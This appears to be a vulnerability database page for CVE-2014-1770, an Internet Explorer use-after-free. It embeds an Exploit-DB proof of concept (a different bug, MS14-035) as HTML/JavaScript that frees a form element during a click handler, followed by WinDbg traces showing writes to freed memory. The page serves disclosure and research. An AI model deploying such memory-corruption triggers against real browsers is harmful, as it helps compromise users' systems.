CVE-2014-1770 : Detail

CVE-2014-1770

43.74%V4
Network
2014-05-22 08h00 +00:00
2018-10-12 17h57 +00:00

CVE Descriptions

Use-after-free vulnerability in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript code that interacts improperly with a CollectGarbage function call on a CMarkup object allocated by the CMarkup::CreateInitialMarkup function.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 34010

Publication date : 2014-07-07 22h00 +00:00
Author : Drozdova Liudmila
EDB Verified : No

<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>
<body>
<form id="form1">
<input id="input1" type="text" value="">
</form>
<script>
loaded = false ;
function func() {
  if (loaded) {
    document.body.innerHTML = "" ; // free CFormElement
  }
}
input1 = document.getElementById("input1") ;
input1.onclick = func ;
loaded = true ;
input1.click(); // Call DoClick function
</script>
</body>
</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick
66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]                      <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)    <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0  ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh                   ; memory corruption, write to freed memory

MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi          <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -       c  LFH;busy
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi          <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -       0  LFH;free
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)  [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0  ds:0023:0034cd84=00000001
-->

Products Mentioned

Configuration 0

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Internet_explorer >> Version 11

References

http://www.securitytracker.com/id/1030266
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/239151
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/67544
Tags : vdb-entry, x_refsource_BID